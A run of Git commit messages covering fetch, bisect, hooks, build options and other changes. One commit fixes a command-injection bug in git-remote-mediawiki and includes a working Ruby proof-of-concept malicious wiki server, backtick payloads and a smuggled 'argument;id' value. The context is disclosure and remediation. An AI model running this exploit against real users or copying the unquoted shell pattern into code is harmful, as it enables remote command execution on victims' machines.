longer appear on the remote.
5. --no-write-fetch-head prevents updating FETCH_HEAD.
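Putting the five options together, the background fetch for one remote could be assembled roughly like this. The sketch is in Python and only builds the argument list; the function name and the order of the options are assumptions, while the options and the refspec are the ones listed above.

```python
def prefetch_command(remote):
    # Build (but do not run) the argument list for a background prefetch.
    return [
        "git", "fetch", remote,
        "--prune",                # drop refs/prefetch/<remote> refs gone upstream
        "--no-tags",              # leave new tags for the foreground fetch
        "--no-write-fetch-head",  # do not touch FETCH_HEAD
        "--refmap=",              # ignore the configured refspecs
        f"+refs/heads/*:refs/prefetch/{remote}/*",
    ]
```

Passing the result to a process launcher as a list (rather than a shell string) keeps the `*` characters in the refspec from being expanded by a shell.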
We've been using this step as a critical background job in Scalar
[1] (and VFS for Git). This solved a pain point that was showing up
in user reports: fetching was a pain! Users do not like waiting to
download the data that was created while they were away from their
machines. After implementing background fetch, the foreground fetch
commands sped up significantly because they mostly just update refs
and download a small amount of new data. The effect is especially
dramatic when paired with --no-show-forced-updates (through
fetch.showForcedUpdates=false).
[1] https://github.com/microsoft/scalar/blob/master/Scalar.Common/Maintenance/FetchStep.cs
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We already match "committer", and we're about to start
matching more things. Let's use a more neutral variable to
avoid confusion.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 06f5608c14 (bisect--helper: `bisect_start` shell function
partially in C, 2019-01-02), we changed the following shell
code:
- rev=$(git rev-parse -q --verify "$arg^{commit}") || {
- test $has_double_dash -eq 1 &&
- die "$(eval_gettext "'\$arg' does not appear to be a valid revision")"
- break
- }
- revs="$revs $rev"
into:
+ char *commit_id = xstrfmt("%s^{commit}", arg);
+ if (get_oid(commit_id, &oid) && has_double_dash)
+ die(_("'%s' does not appear to be a valid "
+ "revision"), arg);
+
+ string_list_append(&revs, oid_to_hex(&oid));
+ free(commit_id);
In case of an invalid "arg" when "has_double_dash" is false, the old
code would "break" out of the argument loop.
In the new C code though, `oid_to_hex(&oid)` is unconditionally
appended to "revs". This is wrong first because "oid" is junk as
`get_oid(commit_id, &oid)` failed and second because it doesn't break
out of the argument loop.
Not breaking out of the argument loop means that "arg" is then not
treated as a path restriction (which is wrong).
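The behavior of the old shell loop, which the fix is meant to restore, can be modeled as below. This is a hedged Python sketch, not the C code in bisect--helper: `resolve_commit` is a hypothetical callback standing in for the revision lookup, and `args` is assumed to hold only the arguments before any "--".

```python
def split_revs_and_paths(args, has_double_dash, resolve_commit):
    # resolve_commit(arg) returns an object name, or None when arg is not
    # a valid revision.
    revs = []
    for index, arg in enumerate(args):
        oid = resolve_commit(arg)
        if oid is None:
            if has_double_dash:
                raise ValueError(
                    f"'{arg}' does not appear to be a valid revision")
            # Without "--", stop here: this argument and everything after
            # it is treated as a path restriction.
            return revs, list(args[index:])
        # Only a successfully resolved object name is ever appended.
        revs.append(oid)
    return revs, []
```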
Signed-off-by: Christian Couder <chriscool@tuxfamily.org>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A user who understands enough to set pull.ff does not need additional
instructions.
Signed-off-by: Alex Henrie <alexhenrie24@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The command reads a list of object names to place on the ignore list
either from the command line or from a file, but they are not
checked against their object type (those read from the file are not
even checked for object existence).
Extend the oidset_parse_file() API and allow it to take a callback
that can be used to die (e.g. when an inappropriate input is read)
or modify the object name read (e.g. when a tag pointing at a commit
is read, and the caller wants a commit object name), and use it in
the code that handles ignore list.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Only skip diffstats when both oids are valid and identical. This check
was causing both false-positives (files included in diffstats with no
actual changes, i.e. 0 lines modified) and false-negatives (showing 0
lines modified in stats when files had actually changed).
Also replaced same_contents with may_differ to avoid confusion.
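The rule stated in the first sentence can be expressed as a single predicate. This Python sketch is illustrative only: `FileSpec` is a hypothetical stand-in for the two sides of a file pair, and the real diff code may take more conditions into account than the one described here.

```python
from dataclasses import dataclass


@dataclass
class FileSpec:
    # Hypothetical stand-in for one side of a diff file pair.
    oid: str
    oid_valid: bool


def may_differ(one, two):
    # The diffstat entry can be skipped only when both object names are
    # valid and identical; in every other case the contents may differ.
    return not (one.oid_valid and two.oid_valid and one.oid == two.oid)
```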
Signed-off-by: Thomas Guyot-Sionnest <tguyot@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This reverts commit f39ad38410.
That commit was trying to silence a type-punning warning on older
versions of gcc. However, its analysis was all wrong. I didn't notice
that we _were_ in fact type-punning because there are two versions of
put_be32(): one that uses casts and unaligned loads, and another that
uses bitshifts. I looked at the latter, but on my platform we were
defaulting to the former.
However, as of the previous commit, we'll always use the bitshift
version. So we can drop this hackery to avoid the warning, making the
code slightly cleaner.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Our put_be32() routine and its variants (get_be32(), put_be64(), etc)
have two implementations: on some platforms we cast memory in place and
use ntohl()/htonl(), which can cause unaligned memory access. And on
others, we pick out the individual bytes using bitshifts.
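For readers unfamiliar with the bitshift approach, here is a small Python model of it. The function names mirror the C helpers, but the signatures (a bytearray plus an offset) are an assumption made for this sketch; the point is only that each byte is read or written individually, so alignment never matters.

```python
def put_be32(buf, offset, value):
    # Store a 32-bit value most-significant byte first, one byte at a time.
    buf[offset + 0] = (value >> 24) & 0xFF
    buf[offset + 1] = (value >> 16) & 0xFF
    buf[offset + 2] = (value >> 8) & 0xFF
    buf[offset + 3] = value & 0xFF


def get_be32(buf, offset):
    # Reassemble the value from its four bytes with shifts.
    return ((buf[offset + 0] << 24) |
            (buf[offset + 1] << 16) |
            (buf[offset + 2] << 8) |
            buf[offset + 3])
```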
This introduces extra complexity, and sometimes causes compilers to
generate warnings about type-punning. And it's not clear there's any
performance advantage.
This split goes back to 660231aa97 (block-sha1: support for
architectures with memory alignment restrictions, 2009-08-12). The
unaligned versions were part of the original block-sha1 code in
d7c208a92e (Add new optimized C 'block-sha1' routines, 2009-08-05),
which says it is:
Based on the mozilla SHA1 routine, but doing the input data accesses a
word at a time and with 'htonl()' instead of loading bytes and shifting.
Back then, Linus provided timings versus the mozilla code which showed a
27% improvement:
https://lore.kernel.org/git/alpine.LFD.2.01.0908051545000.3390@localhost.localdomain/
However, the unaligned loads were either not the useful part of that
speedup, or perhaps compilers and processors have changed since then.
Here are times for computing the sha1 of 4GB of random data, with and
without -DNO_UNALIGNED_LOADS (and BLK_SHA1=1, of course). This is with
gcc 10, -O2, and the processor is a Core i9-9880H.
[stock]
Benchmark #1: t/helper/test-tool sha1 <foo.rand
Time (mean ± σ): 6.638 s ± 0.081 s [User: 6.269 s, System: 0.368 s]
Range (min … max): 6.550 s … 6.841 s 10 runs
[-DNO_UNALIGNED_LOADS]
Benchmark #1: t/helper/test-tool sha1 <foo.rand
Time (mean ± σ): 6.418 s ± 0.015 s [User: 6.058 s, System: 0.360 s]
Range (min … max): 6.394 s … 6.447 s 10 runs
And here's the same test run on an AMD A8-7600, using gcc 8.
[stock]
Benchmark #1: t/helper/test-tool sha1 <foo.rand
Time (mean ± σ): 11.721 s ± 0.113 s [User: 10.761 s, System: 0.951 s]
Range (min … max): 11.509 s … 11.861 s 10 runs
[-DNO_UNALIGNED_LOADS]
Benchmark #1: t/helper/test-tool sha1 <foo.rand
Time (mean ± σ): 11.744 s ± 0.066 s [User: 10.807 s, System: 0.928 s]
Range (min … max): 11.637 s … 11.863 s 10 runs
So the unaligned loads don't seem to help much, and actually make things
worse. It's possible there are platforms where they provide more
benefit, but:
- the non-x86 platforms for which we use this code are old and obscure
(powerpc and s390).
- the main caller that cares about performance is block-sha1. But
these days it is rarely used anyway, in favor of sha1dc (which is
already much slower, and nobody seems to have cared that much).
Let's just drop unaligned versions entirely in the name of simplicity.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Reimplement the `bisect_next()` and the `bisect_auto_next()` shell functions
in C and add the subcommands to `git bisect--helper` to call them from
git-bisect.sh .
The bisect_auto_next() function returns an enum bisect_error so that
`git bisect` as a whole can exit with an error code when bisect_next()
does. Return an error when `bisect_next()` fails, which fixes a bug in
the shell script version.
Using `--bisect-next` and `--bisect-auto-next` subcommands is a
temporary measure to port shell function to C so as to use the existing
test suite. As more functions are ported, `--bisect-auto-next`
subcommand will be retired and will be called by some other methods.
Mentored-by: Lars Schneider <larsxschneider@gmail.com>
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Signed-off-by: Pranit Bauva <pranit.bauva@gmail.com>
Signed-off-by: Tanushree Tumane <tanushreetumane@gmail.com>
Signed-off-by: Miriam Rubio <mirucam@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As there can be other revision walks after bisect_next_all(),
let's add a call to a function to clear all the marks at the
end of bisect_next_all().
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Signed-off-by: Miriam Rubio <mirucam@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Reimplement the `bisect_autostart()` shell function in C and add the
C implementation from `bisect_next()` which was previously left
uncovered.
Add `--bisect-autostart` subcommand to be called from git-bisect.sh.
Using `--bisect-autostart` subcommand is a temporary measure to port
the shell function to C so as to use the existing test suite. As more
functions are ported, this subcommand will be retired and
bisect_autostart() will be called directly by `bisect_state()`.
Change behavior of shell script that returned success when user aborted
the bisection.
Mentored-by: Lars Schneider <larsxschneider@gmail.com>
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Pranit Bauva <pranit.bauva@gmail.com>
Signed-off-by: Tanushree Tumane <tanushreetumane@gmail.com>
Signed-off-by: Miriam Rubio <mirucam@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The update sample hook has the zero OID hardcoded as 40 zeros. However,
with the introduction of SHA-256 support, this assumption no longer
holds true. Replace the hardcoded $z40 with a call to
git hash-object --stdin </dev/null | tr '[0-9a-f]' '0'
so the sample hook becomes hash-agnostic.
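The same trick can be modeled outside the shell. The Python sketch below hashes an empty blob the way 'git hash-object' would (the "blob 0" header followed by a NUL byte) and then maps every hex digit to '0'; the function name is hypothetical, and the algorithm names are those understood by Python's hashlib.

```python
import hashlib


def zero_oid(algorithm="sha1"):
    # Hash an empty blob, then replace every hex digit with '0', mirroring
    # the `tr '[0-9a-f]' '0'` step. Only the length of the result depends
    # on the hash algorithm.
    empty_blob = hashlib.new(algorithm, b"blob 0\0").hexdigest()
    return empty_blob.translate(str.maketrans(
        "0123456789abcdef", "0" * 16))
```

The all-zero name is 40 characters long for SHA-1 and 64 for SHA-256, which is why a hardcoded 40-zero string stops working.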
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The pre-push sample hook has the zero OID hardcoded as 40 zeros.
However, with the introduction of SHA-256 support, this assumption no
longer holds true. Replace the hardcoded $z40 with a call to
git hash-object --stdin </dev/null | tr '[0-9a-f]' '0'
so the sample hook becomes hash-agnostic.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The preferred form for a command substitution is $() over ``. Use this
form for the command substitution in the sample hook.
The preferred form for conditional tests is to use `test` over [].
Replace [] with `test`.
Finally, replace all instances of "sha" with "oid".
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
"git fetch --all --ipv4/--ipv6" forgot to pass the protocol options
to instances of the "git fetch" that talk to individual remotes,
which has been corrected.
* ar/fetch-ipversion-in-all:
fetch: pass --ipv4 and --ipv6 options to sub-fetches
Update to command line completion (in contrib/)
* dl/complete-format-patch-recent-features:
contrib/completion: complete options that take refs for format-patch
"git remote set-head" that failed still said something that hints
the operation went through, which was misleading.
* cs/don-t-pretend-a-failed-remote-set-head-succeeded:
remote: don't show success message when set-head fails
There is logic to estimate how many objects are in the
repository, which is meant to run once per process invocation, but
it ran every time the estimated value was requested.
* jk/dont-count-existing-objects-twice:
packfile: actually set approximate_object_count_valid
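The pattern at issue is a value cached behind a "valid" flag. A minimal Python sketch of the intended behavior follows; the class and method names are hypothetical, and the counting callback stands in for the real estimation code.

```python
class ObjectCountCache:
    def __init__(self, count_objects):
        self._count_objects = count_objects  # the expensive estimation
        self._valid = False
        self._value = 0

    def approximate_count(self):
        if not self._valid:
            self._value = self._count_objects()
            # Without this assignment the estimate is recomputed on
            # every request, which is the symptom described above.
            self._valid = True
        return self._value
```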
"git for-each-ref" and friends that list refs used to allow only
one --merged or --no-merged to filter them; they learned to take
a combination of both kinds of filtering.
* al/ref-filter-merged-and-no-merged:
Doc: prefer more specific file name
ref-filter: make internal reachable-filter API more precise
ref-filter: allow merged and no-merged filters
Doc: cover multiple contains/no-contains filters
t3201: test multiple branch filter combinations
The 'meld' backend of the "git mergetool" learned to give the
underlying 'meld' the '--auto-merge' option, which would help
reduce the amount of text that requires manual merging.
* ls/mergetool-meld-auto-merge:
mergetool: allow auto-merge for meld to follow the vim-diff behavior
"git index-pack" learned to resolve deltified objects with greater
parallelism.
* jt/threaded-index-pack:
index-pack: make quantum of work smaller
index-pack: make resolve_delta() assume base data
index-pack: calculate {ref,ofs}_{first,last} early
index-pack: remove redundant child field
index-pack: unify threaded and unthreaded code
index-pack: remove redundant parameter
Documentation: deltaBaseCacheLimit is per-thread
"format-patch --range-diff=<prev> <origin>..HEAD" has been taught
not to ignore <origin> when <prev> is a single version.
* es/format-patch-interdiff-cleanup:
format-patch: use 'origin' as start of current-series-range when known
diff-lib: tighten show_interdiff()'s interface
diff: move show_interdiff() from its own file to diff-lib
If a user is cloning a SHA-1 repository with GIT_DEFAULT_HASH set to
"sha256", then we can end up with a repository where the repository
format version is 0 but the extensions.objectformat key is set to
"sha256". This is both wrong (the user has a SHA-1 repository) and
nonfunctional (because the extension cannot be used in a v0 repository).
This happens because in a clone, we initially set up the repository, and
then change its algorithm based on what the remote side tells us it's
using. We've initially set up the repository as SHA-256 in this case,
and then later on reset the repository version without clearing the
extension.
We could just always set the extension in this case, but that would mean
that our SHA-1 repositories weren't compatible with older Git versions,
even though there's no reason why they shouldn't be. And we also don't
want to initialize the repository as SHA-1 initially, since that means
if we're cloning an empty repository, we'll have failed to honor the
GIT_DEFAULT_HASH variable and will end up with a SHA-1 repository, not a
SHA-256 repository.
Neither of those are appealing, so let's tell the repository
initialization code if we're doing a reinit like this, and if so, to
clear the extension if we're using SHA-1. This makes sure we produce a
valid and functional repository and doesn't break any of our other use
cases.
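The resulting rule can be summarized in a few lines. This Python sketch models the configuration as a plain dictionary and is only an illustration of the decision described above; the function name and the dictionary representation are assumptions, not Git's internal API.

```python
def finalize_repo_format(config, hash_algo, reinit):
    # Return a copy of `config` adjusted for the hash algorithm that the
    # remote side reported.
    updated = dict(config)
    if hash_algo == "sha1":
        # SHA-1 repositories stay at format version 0 so that older Git
        # versions can still read them.
        updated["core.repositoryformatversion"] = "0"
        if reinit:
            # Clear an extension left over from the initial setup.
            updated.pop("extensions.objectformat", None)
    else:
        # The extension cannot be used in a v0 repository.
        updated["core.repositoryformatversion"] = "1"
        updated["extensions.objectformat"] = hash_algo
    return updated
```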
Reported-by: Matheus Tavares <matheus.bernardino@usp.br>
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Spaces are replaced with tabs when possible. In some cases just
replacing spaces with tabs would break readability, so it was left as it
is.
Signed-off-by: Serg Tereshchenko <serg.partizan@gmail.com>
Signed-off-by: Pratyush Yadav <me@yadavpratyush.com>
We try to flush the output from diff-highlight whenever we see a blank
line. That lets you see the output for each commit as soon as it is
generated, even if Git is still chugging away at a diff, or traversing
to find the next commit.
However, our "blank line" match checks length($_). That won't ever be
true, because we haven't chomped the line ending. As a result, we never
flush. Instead, let's use a simple regex which handles line endings
with the end-of-line marker.
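The difference between the two checks is easy to reproduce in another language. The following Python sketch is an analogy rather than the Perl code from the script: a line that still carries its newline never has length zero, whereas `$` in a regex also matches just before a trailing newline (as it does in Perl).

```python
import re


def is_blank_by_length(line):
    # Never true for a line read from input, because the trailing "\n"
    # is still attached.
    return len(line) == 0


def is_blank_by_regex(line):
    # "$" matches at the end of the string or just before a final newline.
    return re.match(r"^$", line) is not None
```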
This has been broken since the initial version in 927a13fe87 (contrib:
add diff highlight script, 2011-10-18). Probably nobody noticed because:
- most output is big enough, or comes fast enough, that it flushes
anyway. And it can be difficult to notice the difference between
"show a commit, then pause" and "pause, then show two commits". I
only noticed because I was viewing "git log" output on a repo with a
very slow textconv filter.
- if stdout is going to the terminal (and not another pager like
less), then the flush isn't necessary. So any manual testing would
show it appearing to work.
You can easily see the difference with something like:
echo '* diff=slow' >>.gitattributes
git -c diff.slow.textconv='sleep 1; cat' \
-c pager.log='diff-highlight | less' \
log -p
That should generate one commit every second or so (more if it touches
multiple files), but without this patch it waits for many seconds before
generating several pages of output.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The variable core_partial_clone_filter_default has been unused since
fa3d1b63e8 ("promisor-remote: parse remote.*.partialclonefilter",
2019-06-25), when Git was changed to refer to
remote.*.partialclonefilter as the default filter when fetching in a
partial clone, but (perhaps inadvertently) there was no fallback to
core.partialclonefilter.
One alternative is to add the fallback, but the aforementioned change
was made more than a year ago and I have not heard of any complaints
regarding this matter. In addition, there is currently no mention of
core.partialclonefilter in the user documentation. So it seems best to
reaffirm that Git will only support remote.*.partialclonefilter.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Since e4597aae65 (run test suite without dashed git-commands in PATH,
2009-12-02), we stopped running our tests with `git-foo` binaries found
at the top-level directory of a freshly built source tree; instead we
have placed only `git` and selected `git-foo` commands that must be on
`$PATH` in `bin-wrappers/` and prepended that `bin-wrappers/` to the
`PATH` used in the test suite. We did that to catch the tests and
scripted Git commands that still try to use the dashed form.
Since CI jobs will not install the built Git to anywhere, and the
hardlinks we make at the top-level of the source tree for `git-add` and
friends are not even used during tests, they are pure waste of resources
these days.
Thanks to the newly invented `SKIP_DASHED_BUILT_INS` knob, we can now
skip creating these links in the source tree. So let's do that.
Note that this change introduces a subtle change of behavior: when Git's
`cmd_main()` calls `setup_path()`, it inserts the value of
`GIT_EXEC_PATH` (defaulting to `<prefix>/libexec/git-core`) at the
beginning of the environment variable `PATH`. This is necessary to find
e.g. scripted commands that are installed in that location. For the
purposes of Git's test suite, the `bin-wrappers/` scripts override
`GIT_EXEC_PATH` to point to the top-level directory of the source code.
In other words, if a scripted command had used a dashed invocation of a
built-in Git command, it would not have been caught previously, which is
fixed by this change.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
For a long time already, the non-dashed form of the built-ins is the
recommended way to write scripts, i.e. it is better to call `git merge
[...]` than to call `git-merge [...]`.
While Git still supports the dashed form (by hard-linking the `git`
executable to the dashed name in `libexec/git-core/`), in practice, it
is probably almost irrelevant.
However, we *do* care about keeping people's scripts working (even if
they were written before the non-dashed form started to be recommended).
Keeping this backwards-compatibility is not necessarily cheap, though:
even so much as amending the tip commit in a git.git checkout will
require re-linking all of those dashed commands. On this developer's
laptop, this makes a noticeable difference:
$ touch version.c && time make
CC version.o
AR libgit.a
LINK git-bugreport.exe
[... 11 similar lines ...]
LN/CP git-remote-https.exe
LN/CP git-remote-ftp.exe
LN/CP git-remote-ftps.exe
LINK git.exe
BUILTIN git-add.exe
[... 123 similar lines ...]
BUILTIN all
SUBDIR git-gui
SUBDIR gitk-git
SUBDIR templates
LINK t/helper/test-fake-ssh.exe
LINK t/helper/test-line-buffer.exe
LINK t/helper/test-svn-fe.exe
LINK t/helper/test-tool.exe
real 0m36.633s
user 0m3.794s
sys 0m14.141s
$ touch version.c && time make SKIP_DASHED_BUILT_INS=1
CC version.o
AR libgit.a
LINK git-bugreport.exe
[... 11 similar lines ...]
LN/CP git-remote-https.exe
LN/CP git-remote-ftp.exe
LN/CP git-remote-ftps.exe
LINK git.exe
BUILTIN git-receive-pack.exe
BUILTIN git-upload-archive.exe
BUILTIN git-upload-pack.exe
BUILTIN all
SUBDIR git-gui
SUBDIR gitk-git
SUBDIR templates
LINK t/helper/test-fake-ssh.exe
LINK t/helper/test-line-buffer.exe
LINK t/helper/test-svn-fe.exe
LINK t/helper/test-tool.exe
real 0m23.717s
user 0m1.562s
sys 0m5.210s
Also, `.zip` files do not have any standardized support for hard-links,
therefore "zipping up" the executables will result in inflated disk
usage. (To keep down the size of the "MinGit" variant of Git for
Windows, which is distributed as a `.zip` file, the hard-links are
excluded specifically.)
In addition to that, some programs that are regularly used to assess
disk usage fail to realize that those are hard-links, and heavily
overcount disk usage. Most notably, this was the case with Windows
Explorer up until the last couple of Windows 10 versions. See e.g.
https://github.com/msysgit/msysgit/issues/58.
To save on the time needed to hard-link these dashed commands, with the
plan to eventually stop shipping with those hard-links on Windows, let's
introduce a Makefile knob to skip generating them.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There is a hard-coded list of `.pdb` files to copy. But we are about to
introduce the `SKIP_DASHED_BUILT_INS` knob in the `Makefile`, which
might make this hard-coded list incorrect.
Let's switch to a dynamically-generated list instead.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
To avoid branch names with a loaded history, we already started to avoid
using the name "master" in a couple instances.
The `t3200-branch.sh` script uses variations of this name for branches
other than the default one. So let's change those names, as
"lowest-hanging fruits" in the effort to use more inclusive naming
throughout Git's source code. While at it, make those branch names
independent from the default branch name.
In this particular instance, this rename requires a couple of
non-trivial adjustments, as the aligned output depends on the maximum
length of the displayed branches (which we now changed), and also on the
alphabetical order (which we now changed, too).
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In an ongoing effort to avoid non-inclusive language, let's avoid using
the branch name "master" in a code comment.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the ongoing effort to make the Git project a more inclusive place,
let's try to avoid names like "master" where possible.
In this instance, the use of the term `slave` is unfortunately enshrined
in IO::Pty's API. We simply cannot avoid using that word here. But at
least we can get rid of the usage of the word `master` and hope that
IO::Pty will be eventually adjusted, too.
Guessing that IO::Pty might follow Python's lead, we replace the name
`master` by `parent` (hoping that IO::Pty will adopt the parent/child
nomenclature, too).
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The previous commit introduced --merge-base, a way to take the diff
between the working tree or index and the merge base between an arbitrary
commit and HEAD. It makes sense to extend this option to support the
case where two commits are given too and behave in a manner identical to
`git diff A...B`.
Introduce the --merge-base flag as an alternative to triple-dot
notation. Thus, we would be able to write the above as
`git diff --merge-base A B`.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove the use of run_git_unquoted() completely with a use of "sh -c"
suggested by Jeff King, i.e.:
sh -c '"$@" 2>/dev/null' -- echo sneaky 'argument;id'
I don't think this is needed now for any potential RCE issue. The
$remotename argument is ultimately picked by the local user (and
similarly, the $local variable comes from a user-supplied
refspec).
But completely eliminating the use of unquoted shell arguments has a
value in and of itself, by making the code easier to review. As noted
in an earlier commit I think the use of IPC::Open3 would be too
verbose here, but this "sh -c" trick strikes the right balance between
readability and semantic sanity.
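To see why the "sh -c" form is safe, it helps to run it with the arguments passed as a list. The Python sketch below does that; it assumes a POSIX `sh` is available on PATH, and the function name is hypothetical. The script text is the fixed string `"$@" 2>/dev/null`, `--` fills `$0`, and the remaining arguments arrive as `"$@"` without ever being re-parsed by the shell.

```python
import subprocess


def run_quietly(argv):
    # Run argv with stderr discarded; the shell only ever parses the
    # constant script, never the arguments themselves.
    result = subprocess.run(
        ["sh", "-c", '"$@" 2>/dev/null', "--"] + list(argv),
        stdout=subprocess.PIPE,
        universal_newlines=True,
    )
    return result.stdout
```

Calling `run_quietly(["echo", "sneaky", "argument;id"])` prints the semicolon literally instead of running `id` as a second command.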
Suggested-by: Jeff King <peff@peff.net>
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Explicitly annotate the invocations of run_git() which don't use
quoted arguments. I'm not converting these to run_git_quoted() because
these invocations pipe stderr to /dev/null, which the Perl open() API
doesn't support.
We could do a quoted version of this with IPC::Open3, but I don't
think it's worth it to go through that here. Let's instead just mark
these sites, and comment on why it's OK to use the variables we're
using.
This eliminates the last uses of run_git(), so we can remove the alias
for it introduced in an earlier commit.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change those callsites that are able to call run_git() with a quoted
list of arguments to do so.
This fixes a RCE bug in this transport helper reported by Joern
Schneeweisz to the git-security mailing list. The issue is being made
public due to the relative obscurity of the remote-mediawiki code.
The security issue is that we'd execute a command like this via Perl's
"open -|", where the $name is taken directly from the api.php
response. So that a JSON response of e.g.:
[...]"title":"`id>/tmp/mw`:Main Page"[..]
Would result in an invocation of:
git config --add remote.origin.namespaceCache "`id>/tmp/mw`:notANameSpace"
From code such as this, which is being changed by this patch:
run_git(qq(config --add remote.${remotename}.namespaceCache "${name}:${store_id}"));
So we'd execute an arbitrary command, and also put
"remote.origin.namespaceCache=:notANameSpace" in the config. With this
change we quote all of this, so now we'll simply write
"remote.origin.namespaceCache=`id>/tmp/x`:notANameSpace" into the
config, and not execute any remote commands.
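The difference between the two styles can be sketched in Python with a harmless payload. This is an illustration only, not the Perl code from the patch: the "unquoted" call hands one string to a shell, the "quoted" call passes a list of arguments and involves no shell.

```python
import subprocess

# Attacker-controlled page title, shaped like the JSON response above, but
# with a harmless command substituted for illustration.
name = "`echo INJECTED`:Main Page"

# Unquoted: the whole command line is parsed by a shell, so the backticks run.
unquoted = subprocess.run(
    'echo "' + name + '"', shell=True, stdout=subprocess.PIPE
).stdout.decode()

# Quoted: each list element is passed as one argument, no shell involved.
quoted = subprocess.run(
    ["echo", name], stdout=subprocess.PIPE
).stdout.decode()
```

In the first case the output starts with INJECTED, showing that the embedded command was executed; in the second the backticks are printed verbatim.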
About the implementation: as noted in [1] (see also [2]) this style of
invoking open() has compatibility issues on Windows up to Perl
5.22. However, Johannes Schindelin notes that we shouldn't worry about
Windows in this context because (quoting a private E-Mail of his):
1. The mediawiki helper has never been shipped as part of an
official Git for Windows version. Neither has it ever been part
of an official MSYS2 package. Which means that Windows users
who want to use the mediawiki helper have to build Git
themselves, which not many users seem to do.
2. The last Git for Windows version to ship with Perl v5.22.x was
Git for Windows v2.11.1; Since Git for Windows
v2.12.0 (released on February 25th, 2017), only newer Perl
versions were included.
So let's just use this open() API. Grepping around shows that various
other Perl code we ship such as gitweb etc. uses this way of calling
open(), so we shouldn't have any issues with compatibility.
For further reference and future testing, here's working exploit code
provided by Joern:
#!/usr/bin/ruby
# git client side RCE via `mediawiki` remote proof of concept
# Joern Schneeweisz - GitLab Security Research Team
require 'sinatra'
set bind: '0.0.0.0'
if not ARGV[0]
puts "Please provide the shell command to be executed."
exit -1
end
cmd = ARGV[0]
all_pages = sprintf('{"limits":{"allpages":500},"query":{"allpages":[{"pageid":1,"ns":3,"title":"`%s`:Main Page"}]}}', cmd)
revs = sprintf('{"query":{"pages":{"1":{"pageid":1,"ns":3,"title":"`%s`:Main Page","revisions":[{"revid":1,"parentid":0,"user":"MediaWiki default","timestamp":"2020-09-04T20:25:08Z","contentformat":"text/x-wiki","contentmodel":"wikitext","comment":"","*":"<al:MyLanguage/Help:Contents]"}]}}}}', cmd)
mainpage= sprintf('{"batchcomplete":"","query":{"pages":{"1":{"pageid":1,"ns":3,"title":"`%s`:Main Page","revisions":[{"revid":1,"parentid":0}]}}}}',cmd)
post '/api.php' do
if params[:list] == 'allpages'
return all_pages
end
if params[:prop] == 'revisions'
return revs
end
return mainpage
end
Which:
[...] should be run like: `ruby wiki.rb 'id>/tmp/mw'`. Now when
being cloned with `git clone mediawiki::http://localhost:4567` the
file `/tmp/mw` will be created during the clone process,
containing the output of `id`.
1. https://perldoc.perl.org/functions/open.html#Opening-a-filehandle-into-a-command
2. https://perldoc.perl.org/perlipc.html#Safe-Pipe-Opens
Reported-by: Joern Schneeweisz <jschneeweisz@gitlab.com>
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Invoking commands as "git $args" doesn't quote $args. Let's support
["git", $args] as well, and create corresponding run_git_quoted() and
run_git_unquoted() aliases for subsequent changes when we move the
code over to the new style of invoking this function. At that point
we'll delete the then-unused run_git() wrapper.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
These tests consistently fail for me, and were failing before any of
the changes in this series. As noted in [1] there are some known
intermittent test failures. Let's mark these as failing so we can have
an otherwise passing test suite.
We need to add an extra test_path_is_file() here because since
d572f52a64 ("test_cmp: diagnose incorrect arguments", 2020-08-09)
test_cmp has errored out with a BUG if one of its arguments
doesn't exist. Without that extra check the test would still fail even with
test_expect_failure().
1. https://github.com/Git-Mediawiki/Git-Mediawiki/issues/56
